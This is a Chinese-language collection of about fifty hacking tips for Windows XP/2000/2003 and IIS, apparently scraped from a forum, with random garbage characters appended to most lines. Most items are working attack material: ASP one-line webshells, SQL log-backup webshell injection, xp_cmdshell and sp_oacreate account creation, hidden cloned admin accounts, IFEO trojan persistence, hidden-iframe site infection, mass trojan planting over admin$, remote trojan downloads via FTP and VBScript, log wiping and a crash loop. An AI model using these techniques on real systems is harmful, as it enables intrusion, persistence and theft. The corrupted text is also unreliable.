Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 h B7 i% o& i
cacls C:\windows\system32 /G hqw20:R) S8 O. }4 O) Q+ {( I0 Y! Z- I
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入. j; N+ s* l- K4 P0 q
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F9 x3 Q; X# X% N3 j+ }
3 a* h9 Y$ w& b: f2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
& L3 M d/ k7 S
; c7 [2 ]" i7 I" N" c% i8 z4 w3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。2 S" f; z* H* I& v) j
; C9 l f9 q# k" f4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 B) q( g0 c4 k7 ], x% N6 x2 w; P
3 ?+ v- M* J- V- H# M5、利用INF文件来修改注册表
0 z- t; d( E- S+ j$ ?9 r[Version]
3 Q( _2 m$ Y3 FSignature="$CHICAGO$"4 }% K. {, b6 z N; k
[Defaultinstall]
% A8 g# p4 ?* n8 q5 zaddREG=Ating
; |( I1 A4 ^. Z- T+ x[Ating]
- Y+ _$ z! G! ^* rHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"6 U% S2 P; w4 t# f/ ]2 F9 X# _
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:5 e. E* o% i" M' e
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径2 T; i/ Y* k* F% T2 }
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* x _( ~, O3 ?; T; {6 Z0 P
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
- i) F9 Z. L3 ^% a) PHKEY_CURRENT_CONFIG 简写为 HKCC
* n$ D6 l" c# o$ r; ^0 o* R0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
7 L4 X s- K+ ]+ C' T8 A$ L"1"这里代表是写入或删除注册表键值中的具体数据
& K M1 h9 T' f+ G
" _# b# s( p9 A! O Z6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
X7 G' t r) U7 u' n多了一步就是在防火墙里添加个端口,然后导出其键值
% x& V+ |6 B* E. C[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 S0 }4 V' ~ I# S6 i' t. }
. G2 e# \& |0 C) B7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ e6 V5 r* D) \5 X, _* `$ Q
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. G+ u" l$ y8 p, n1 K* k8 d( \5 ?2 {' Y
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
6 m5 P# H; r% F. _) [& u+ B" ]& d+ J2 @7 T$ D+ ]
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
4 n0 R* M, ~3 J& q1 P& R% q" n, l# R @; T可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。" O, M: A) R* C& q9 Z2 ^
# V' E; W$ r6 V8 K/ W# t+ f" l$ n
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”/ y2 R3 c2 G, S. [2 t
8 _0 O# }/ T5 d1 Q, r11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,0 I0 L3 K3 |5 u( [
用法:xsniff –pass –hide –log pass.txt8 t; [% B$ m* m4 o* ?$ k; k
, x/ {" b! \0 U! W12、google搜索的艺术4 n) d# r/ H) Y! A
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”! g3 [6 ]- ^3 T) ?# K* L, `
或“字符串的语法错误”可以找到很多sql注入漏洞。; Y' h$ A u+ N F% @
8 A! R/ J* [7 T8 j- x7 @( d13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
" O/ H' P$ l9 @+ f8 ]! O A) o z& `. w x' |9 n
14、cmd中输入 nc –vv –l –p 19876 S5 T0 U. [2 h+ B( l- j! n ?
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃* h3 p! l$ ?# ~& Y' q* _
& g2 |, l/ ?! u( _; Y15、制作T++木马,先写个ating.hta文件,内容为: v6 w+ ^( D# {$ y) `& N8 b K
<script language="VBScript">
3 X8 r! I' Z+ Sset wshshell=createobject ("wscript.shell" )
5 ~# S4 v, l1 w( Ga=wshshell.run("你马的名称",1)! r3 O6 Q1 }/ F m2 b+ O
window.close0 s5 ^' L' n% q! s; [
</script>
% I* ]. X; u0 e0 O; ~2 o* {& i再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. T9 v8 s* w6 A, d. J' S
5 A- L/ K. ?8 F8 \ V4 S0 J16、搜索栏里输入
2 m3 v! h( M5 C9 Y! D关键字%'and 1=1 and '%'='/ e& v4 x- m1 u! e
关键字%'and 1=2 and '%'='
, d5 L) `4 e: A" q比较不同处 可以作为注入的特征字符" g+ s& l8 l6 Q1 [
% K- f9 g @$ U3 L G3 B17、挂马代码<html>
% Z3 v) I, h0 v% a" C- L<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>5 B' W4 A% w- a
</html>: ?4 v4 ]3 M# ~! Y
$ `- T9 j; L* ^+ @6 Z1 r18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
' H, H. H4 [$ x' r% o3 l9 W5 }* F" Vnet localgroup administrators还是可以看出Guest是管理员来。# P* T. R N& o) B
- S1 A0 M: ]5 o- J; b2 L2 H
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
9 M, k F( F, v ^" K用法: 安装: instsrv.exe 服务名称 路径
& T" U8 J8 z9 y: {卸载: instsrv.exe 服务名称 REMOVE
6 i: h3 f$ X+ @0 y6 ~
, {) y2 W! C8 i% M9 N+ V; y" t% D' o5 Q" @0 l: X! n
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉5 \$ S0 F! n, W1 f" J+ P* N9 |2 p
不能注入时要第一时间想到%5c暴库。
, ~) z9 ?/ d3 I+ _/ G9 Y
7 L5 M' D. a1 a22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 U+ p% ^- X: H0 z
( R7 T& J8 @+ L6 H2 e \; h23、缺少xp_cmdshell时7 Z1 T }) h/ j7 H# e6 `
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# z( I: e$ C4 W+ {
假如恢复不成功,可以尝试直接加用户(针对开3389的)- f# r1 M9 v7 Z5 H
declare @o int
" r) S6 P: d- v8 ~/ eexec sp_oacreate 'wscript.shell',@o out8 B" P+ {* C& n& \8 I5 t- w& x
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
3 D- g2 `. O0 @
! O# w+ w; k% X: W; y! ^, g24.批量种植木马.bat5 i5 ?5 ?# `1 p: m( n
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
8 d) j9 f7 T h2 j) a3 ^for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
6 j0 g. P$ ^) U扫描地址.txt里每个主机名一行 用\\开头- t; h3 a- G) j& x# Y0 x* F
7 @2 i, H R n4 J4 g25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
: l; m8 B* u p9 C( C. M0 R) Q+ l9 K$ _8 _2 D5 U
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.8 ^( W% B) e" P/ h0 S! _
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.* E. q% F1 k% A" `$ ?# V% [0 u
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
+ r, R. u4 @6 f$ E+ h8 ?6 m+ Y4 j3 x7 @7 n. T
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 d. C9 Q1 ` C然后用#clear logg和#clear line vty *删除日志8 H4 i, w) A/ F7 P: q
6 \% ?) X9 B; P
28、电脑坏了省去重新安装系统的方法8 Y0 K2 v" o4 @# w, v! J
纯dos下执行,
0 u: j% i4 Q- l, H) A Fxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config/ b7 e/ B4 t5 r+ a! m( `( ]8 m
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config$ r6 u9 M* ]* N$ p& k
0 u: U: @* u6 n+ R$ q
29、解决TCP/IP筛选 在注册表里有三处,分别是:4 X. v& S: Q& o& k9 F
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip d; j- M* B! j4 J
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 S! ~% W X( }. ^ H0 \+ w( J
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: ~) ]4 F) A( ^- X' j3 {7 V分别用
1 }+ q/ R' x7 N# {regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 u2 q: z6 t( I/ C7 b, J
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ I% m/ n% X' D8 Y/ Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! E- P, g: u/ b* ^
命令来导出注册表项. _; w I& d- C
然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 X& A! i4 }( A& I) t+ G
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用, J. \# m" u8 P, G9 T
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
5 Q7 @5 U3 V) v/ Q) t0 ?9 _1 n3 v1 q" Q9 {% |/ v
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 N: m" i( H& j3 ~SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3! b# f6 _/ u" c( f# Z; ~( v9 g
/ Z& o5 W3 R A8 x2 W% L }9 i% S
31、全手工打造开3389工具/ x K" e" f8 s; x' l
打开记事本,编辑内容如下:
+ G9 O# @. _) S' ~3 Vecho [Components] > c:\sql
& ~0 Q* I4 q; ]# {/ techo TSEnable = on >> c:\sql
7 L- Z8 R5 B V* _" [* q4 Osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) `# |1 d% G8 u9 ~8 C. ` i
编辑好后存为BAT文件,上传至肉鸡,执行
" I& r8 a8 D. m+ e+ F. R
2 E# d6 s% V9 [; @3 P32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
% | J: t) b( \6 d* h# W
* N1 S5 `5 m5 b8 F# ]: w0 @33、让服务器重启
8 A1 n& f, n) U0 \写个bat死循环:
* L( {' t2 f. I5 R0 [: b@echo off
9 k. Z5 C9 }8 s- X% I:loop19 e }5 O) A4 k* r. w9 a" u: o
cls
5 }' z# t( _% astart cmd.exe
( R4 V$ G/ `) u0 a1 h/ M% {4 ~goto loop1
. @9 F! u5 N! v% j# D+ O$ _- D7 n保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
[0 j6 A0 E" N2 J: @3 L; f
: l- A: J' _! k |" x! g: ]; \$ g! C* _34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
6 a. \; s9 u Y, y% x@echo off
3 |: u4 B# Y* ^8 V( t E9 U) Qdate /t >c:/3389.txt2 A& M O, v' M3 U) J# P
time /t >>c:/3389.txt
- L2 d8 T: R% D! F+ wattrib +s +h c:/3389.bat; y" n0 g+ G, f- D- \. Y
attrib +s +h c:/3389.txt
2 D: `- f Y) ?5 xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ b. w/ b: T7 z% F# o& _: m( D并保存为3389.bat, S8 g6 r$ a$ O0 T
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* J- x) i6 }0 T1 F2 E: p5 B% p' T1 I/ }4 k* _+ L# D7 F6 A
35、有时候提不了权限的话,试试这个命令,在命令行里输入:0 W+ r5 i! R3 Q% F# ]1 Q
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)% T" O/ e% o% o$ U& V
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 W5 [# s9 }5 R( O/ r
! g( ^0 F* r4 O9 e. w7 F3 x) Q36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件0 k7 _7 c* ^7 i: \1 T# |
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
2 u: p$ U+ B# `0 N2 P( U2 c: f" Zecho 你的FTP账号 >>c:\1.bat //输入账号
" C( b' O) e" [! k3 P, lecho 你的FTP密码 >>c:\1.bat //输入密码
% x* \6 g) x2 L7 N' j; L, P& A$ Vecho bin >>c:\1.bat //登入
! G' n. P) [* W4 ~, @. secho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
. Z! h! H$ I# R t: _& Y( O0 ?echo bye >>c:\1.bat //退出
/ e! M, H3 g" ?6 {( W6 M _$ d2 ~# t然后执行ftp -s:c:\1.bat即可
7 h4 f1 F7 |3 g* ^# d, o x4 U6 ^* k* I* W% _# O0 C; v+ s
37、修改注册表开3389两法8 f" @' V8 v& T+ J: A+ Q6 c
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
! K: x" N# R- e; Cecho Windows Registry Editor Version 5.00 >>3389.reg
: |/ S; s5 V7 c5 C, v/ W& recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 u4 }2 U- ?2 S* h7 vecho "Enabled"="0" >>3389.reg) L' H E y2 X8 Y# n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows8 [8 j6 a& p; I3 K j
NT\CurrentVersion\Winlogon] >>3389.reg) ^4 m8 b1 \7 j
echo "ShutdownWithoutLogon"="0" >>3389.reg
8 y5 n, d1 M# o( S- Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! P4 f# u g. V. n: _: C6 l: F>>3389.reg
7 ^; C, n0 Y/ Q- _$ y: Zecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
- p! b$ x& Q4 Q8 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 b) K, n& s# ] y/ _
>>3389.reg* q2 O2 C+ t: {% N
echo "TSEnabled"=dword:00000001 >>3389.reg
# q$ h) H2 l z: ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" a" Z6 t2 u4 y
echo "Start"=dword:00000002 >>3389.reg2 N% B5 B# f/ m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 f8 f3 m2 ^. b/ P L! L4 p8 F>>3389.reg, V |& n: A" h$ ?' W6 D
echo "Start"=dword:00000002 >>3389.reg6 @# a- z! Z g# b. W
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
( X& t* l$ k, ]6 Zecho "Hotkey"="1" >>3389.reg! Y1 R$ k# ?; K; A1 Z: q& O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: ^8 a- T) G$ F- E: R3 xServer\Wds\rdpwd\Tds\tcp] >>3389.reg! W7 Q) Z0 W0 N q2 {3 l1 Q' B
echo "PortNumber"=dword:00000D3D >>3389.reg
) Q& D7 U& a4 |. V, G5 }8 w2 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: m2 b0 i9 M9 @( F( ]( hServer\WinStations\RDP-Tcp] >>3389.reg9 O) m% I% y# Y$ U8 ]5 N# q4 H: b
echo "PortNumber"=dword:00000D3D >>3389.reg7 H6 \) C' B4 T- z x; x1 f
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; ?# W$ u2 D3 p3 O
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! D% Z: w4 F/ z. t- R! f' h% ?8 t因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效+ u9 B/ D2 W# `8 w% @" ?; @
(2)winxp和win2003终端开启
: }7 h" S9 e+ z' b用以下ECHO代码写一个REG文件:
2 U' h1 J7 Z+ j9 h8 T$ ]echo Windows Registry Editor Version 5.00>>3389.reg0 K) T' r+ ^, d# i1 _( l# Z1 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& h1 ?/ ?( @& h4 z0 w6 EServer]>>3389.reg
& }1 D; Q, j+ ~5 k" C: Pecho "fDenyTSConnections"=dword:00000000>>3389.reg2 X9 @6 N. j K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) y+ q. E1 j3 t$ nServer\Wds\rdpwd\Tds\tcp]>>3389.reg
- k" A$ q1 b; z; C1 R+ qecho "PortNumber"=dword:00000d3d>>3389.reg! o. I% O: Y; F1 B/ `7 X8 u& R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal M) V# q3 Z, n8 c7 O
Server\WinStations\RDP-Tcp]>>3389.reg; e9 f" Q+ r+ @+ @& b4 w. B
echo "PortNumber"=dword:00000d3d>>3389.reg
K F `- p0 j. C) z1 Z然后regedit /s 3389.reg del 3389.reg& i2 X( ~" Q e0 C9 F; g% B* k
XP下不论开终端还是改终端端口都不需重启- [+ L1 `! w) @: K9 I# |( z x
- ^1 {1 J( S. B( y# _3 A
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
$ f( X7 w" ?7 O* k8 _6 E0 T' O用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 w8 _7 H8 f: w6 {+ A3 k
& }( f# u4 B$ w% R' J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 b% w! o' s. Q; B; A(1)数据库文件名应复杂并要有特殊字符9 a9 v6 s. C( \) I: O
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
& H- V; G" c" L5 h# @7 ~5 x/ O$ x% ^: j将conn.asp文档中的
p4 k1 [/ n2 Q4 x9 y4 ^DBPath = Server.MapPath("数据库.mdb")( I* g! Q5 R8 S: j) x7 Y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
`3 A& b, ?0 ]/ U' Q. f) b2 |/ _ v) K- B' Y {
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置; L+ Y1 [0 N& y' A
(3)不放在WEB目录里$ M- Q- h" ]' x1 K6 H4 j" d% l
( u }" \# R7 b# f! I" ~6 @6 @8 U. i F
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉3 ?1 x' o$ {& m4 i3 ^
可以写两个bat文件' y) g* n2 \% q: _ \# Y
@echo off
2 f6 ^) p% G# X@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
) C7 e4 R# v$ o: ~, W@del c:\winnt\system32\query.exe
9 w# n! ~& W3 o) B" U@del %SYSTEMROOT%\system32\dllcache\query.exe1 S) y, m& b9 H8 Q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
) z) Y" j$ P( ], n+ Q8 u; q/ R( h: r0 {: d: d* T# F
@echo off# k' \. ~/ s! C1 c
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 O% o, l/ u% M( u" ?$ c B& c: B
@del c:\winnt\system32\tsadmin.exe/ w9 v/ W5 G; t3 h+ Y! G2 q
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; A6 N7 e4 s% g% r9 O* x3 M) K& v) `5 t8 f p' L9 j. X
41、映射对方盘符
- y7 \/ b" j8 w, Y9 a# z: s+ [telnet到他的机器上,1 ^( v- v4 d* N K; N+ f
net share 查看有没有默认共享 如果没有,那么就接着运行
/ _. P% [ p y8 @0 U) [! }net share c$=c:
4 g1 }# e+ t! N) `net share现在有c$
2 ?% r( ?, u" j1 {( B9 Q# H9 M在自己的机器上运行
, o! F+ s8 M, N( P( i0 @) bnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) }# t/ K6 Z5 i2 C3 G1 l1 c" T5 ?: @5 c0 _
42、一些很有用的老知识8 T# ?, `' r& Z$ Q: n
type c:\boot.ini ( 查看系统版本 )6 l6 J3 V( g- K5 g& I% B, l
net start (查看已经启动的服务)& i6 l' Z4 T' Y/ d) Y+ I, v
query user ( 查看当前终端连接 )! Q$ C \- b3 `$ d
net user ( 查看当前用户 )
6 Z# Z3 ^/ }* x. H* Bnet user 用户 密码/add ( 建立账号 )( T0 e6 m3 b) Z) ~7 j
net localgroup administrators 用户 /add (提升某用户为管理员)
" [7 A% F/ r4 L$ {) ~+ jipconfig -all ( 查看IP什么的 )
5 Y7 v" }) X; o: Snetstat -an ( 查看当前网络状态 )
2 S' o; A, ^0 i3 bfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
7 x% Y& ]! G. P* X- l) n6 {' ^) I! q克隆时Administrator对应1F4+ O6 O: ]# L2 K1 t" @
guest对应1F5
5 i7 r0 o- S' |+ F6 H, V$ w8 @/ \tsinternetuser对应3E8! C- [5 E5 `- g) N. E9 T1 ^
/ Q' x4 Z2 G) A0 K' I43、如果对方没开3389,但是装了Remote Administrator Service2 @3 k" W& T. ~& Y$ _! N
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
% }0 z6 V P! a. S. G解释:用serv-u漏洞导入自己配制好的radmin的注册表信息# M% K0 V; [! P
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" J' n. x* J0 M& Q& b) M( V' D p, |; p6 o! S
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
5 }/ K! H/ S! C; r本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). I- k4 p2 c0 n6 Y5 B$ h# O
2 `2 m: C4 |& y/ n/ a4 p8 U" s: `
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
1 S, Y! B1 j. ~# N" U7 h4 {echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# Z$ I+ ~1 u+ W5 r^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
B5 b$ _ ^( X, R. |6 v4 VCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =) l. J0 I) F Y0 w# G
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs$ ?& j H/ h& P; X
(这是完整的一句话,其中没有换行符)
1 _$ k C/ g. x5 {- ?$ `; {1 J然后下载:
4 O, M3 |5 g8 g Fcscript down.vbs http://www.hack520.org/hack.exe hack.exe% `2 |) d2 H, C; E; e% T5 K
6 @% A3 V: Q0 m46、一句话木马成功依赖于两个条件:
" m4 i. _, u$ {8 e; X1、服务端没有禁止adodb.Stream或FSO组件 B0 Z0 Q8 {% d9 [6 {
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) M1 t G# o* x, l+ u+ U$ `0 U+ s7 L$ `7 S' j
47、利用DB_OWNER权限进行手工备份一句话木马的代码:5 h* T* ^4 H. D( C2 S1 e, u& k
;alter database utsz set RECOVERY FULL--
$ Q) P4 x7 q! N6 \4 O. {5 v8 H;create table cmd (a image)--
- ]3 y* h+ z+ \;backup log utsz to disk = 'D:\cmd' with init--
2 S4 q8 N1 {$ T, I h5 A1 f;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--1 G, h9 e, J; z1 A$ @0 ?
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, J# k# ^! W4 @/ J: O
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。3 B' u0 x6 o. U
/ u6 V' C! x; G7 w
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
: |/ V& y) g3 V* s2 f% [4 ^8 x0 ]" d; q! d
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 m4 X, [! X o$ F% R所有会话用 'all'。/ i' H, L0 l5 P# W3 K
-s sessionid 列出会话的信息。8 X' A o8 G8 G: K( L9 Y+ Y2 o
-k sessionid 终止会话。
: E& }* S% a: ?" \2 b* W: j-m sessionid 发送消息到会话。
2 X- L) ^" ~1 E+ k' ?, \2 w( V0 I ]% N; T1 o* t/ l9 u; _+ @
config 配置 telnet 服务器参数。" ?( r9 _+ O) Z8 I+ Z
% j+ ?+ m" \# l! {8 Dcommon_options 为:/ s$ X% S# W* Y$ V2 q) y$ S+ `
-u user 指定要使用其凭据的用户, y; h7 E# o! y% s! M, l$ E
-p password 用户密码0 y) f& W; O1 T" y
M. z" x5 W- }0 n$ H
config_options 为:
5 M H) e( g+ g/ _9 n4 mdom = domain 设定用户的默认域
C5 t [# m) k0 x c# w6 R5 v2 Z7 p/ U# Lctrlakeymap = yes|no 设定 ALT 键的映射2 k5 Y* a, Y/ y( x! Z* ~" l( `
timeout = hh:mm:ss 设定空闲会话超时值8 K) C [ w4 a* i
timeoutactive = yes|no 启用空闲会话。4 K9 M. F, @ k# w- H
maxfail = attempts 设定断开前失败的登录企图数。; ]4 S2 l3 J' y. {/ n. L2 j
maxconn = connections 设定最大连接数。1 m1 V# S; {' f7 ]
port = number 设定 telnet 端口。
; F; n* J; M0 tsec = [+/-]NTLM [+/-]passwd4 @# p( q5 U: L% n7 ]0 K0 {
设定身份验证机构
2 V, D3 ?4 v Z1 u \* hfname = file 指定审计文件名。
# |/ o* Y' Z8 D* N5 Dfsize = size 指定审计文件的最大尺寸(MB)。
6 K- B5 p. F5 G4 Q2 I5 zmode = console|stream 指定操作模式。
6 C6 ]2 u# H7 |1 {% [& p* j5 [auditlocation = eventlog|file|both# ?5 \& O5 T C. o
指定记录地点
7 d/ Y- m& ]* b- P7 [audit = [+/-]user [+/-]fail [+/-]admin
! z, j2 r! T: k; N9 I
/ h& I4 v7 {! ?" v) v6 R49、例如:在IE上访问:
' {6 g3 H; `& F% lwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
+ I9 Y$ p1 W+ @9 B# u* uhack.txt里面的代码是:
! A$ d' h1 S4 z* T<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">! S5 F4 G7 L* h5 ~
把这个hack.txt发到你空间就可以了!2 t. z+ i; \/ m% O+ ^
这个可以利用来做网马哦!( B+ @1 A; Q! c8 q7 K" o
' m& g; w2 V1 ?- x0 D, s7 K7 t x
50、autorun的病毒可以通过手动限制!; a* v2 r8 Q1 z. \& I( L: e
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ j' @8 F& G2 |, T
2,打开盘符用右键打开!切忌双击盘符~
$ \+ @, G1 V" t0 |7 H0 d. @3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
+ b" J) {! C+ \, T L1 \/ [( ]5 k' }0 v9 H ^
51、log备份时的一句话木马:5 x# E5 I1 I I* b$ Z1 o+ k
a).<%%25Execute(request("go"))%%25>1 B- z U# Z- _0 d V# Y( }' o. ~( s
b).<%Execute(request("go"))%>7 b/ J# c a; x6 o
c).%><%execute request("go")%><%
& G1 i/ y/ b5 O1 kd).<script language=VBScript runat=server>execute request("sb")</Script>
/ z$ B5 m' R, S) \! De).<%25Execute(request("l"))%25>" b& {* s) Q. ]* b: a/ q: e
f).<%if request("cmd")<>"" then execute request("pass")%>8 ~# a3 _( o. }* [$ I
) z2 i* [8 i; c" \- t" _
52、at "12:17" /interactive cmd
& \4 g& A# c. K2 D( R# I; {0 C& K1 d0 a执行后可以用AT命令查看新加的任务 o1 \3 P& y. d U5 R* t8 X0 g
